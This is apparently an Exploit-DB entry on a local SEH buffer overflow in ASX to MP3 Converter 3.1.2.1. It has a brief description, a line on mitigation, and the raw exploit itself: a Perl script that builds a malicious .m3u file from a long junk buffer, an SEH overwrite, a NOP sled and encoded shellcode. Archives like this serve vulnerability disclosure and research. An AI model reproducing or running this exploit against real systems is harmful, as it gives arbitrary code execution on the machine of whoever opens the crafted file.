ASX to MP3 Converter Version 3.1.2.1 (2010-03-30) Local Buffer Overflow (SEH)

vendor:

ASX to MP3 Converter

by:

MadjiX

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: ASX to MP3 Converter

Affected Version From: 3.1.2.1

Affected Version To: 3.1.2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:mini-stream:asx_to_mp3_converter

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

ASX to MP3 Converter Version 3.1.2.1 (2010-03-30) Local Buffer Overflow (SEH)

ASX to MP3 Converter Version 3.1.2.1 (2010-03-30) is vulnerable to a local buffer overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted .m3u file with malicious code, which will be executed when the file is opened. This vulnerability can be exploited to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of ASX to MP3 Converter or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: ASX to MP3 Converter Version 3.1.2.1 (2010-03-30) Local
Buffer Overflow (SEH)
# Date: nhar essabt 3-7-10
# Author: MadjiX
# Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe
# Version: 3.1.2.1 ‎(2010-03-30)
# Tested on: xp sp3
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $jnk="\x41" x 43488 ;
my $nseh="\xeb\x06\x90\x90" ;
my $seh="\xBE\x2F\x38\x02" ;
my $nops = "\x90" x 24 ;

open(MYFILE,'>>MadjiX.m3u');
print MYFILE $jnk.$nseh.$seh.$nops.$shellcode;
close(MYFILE);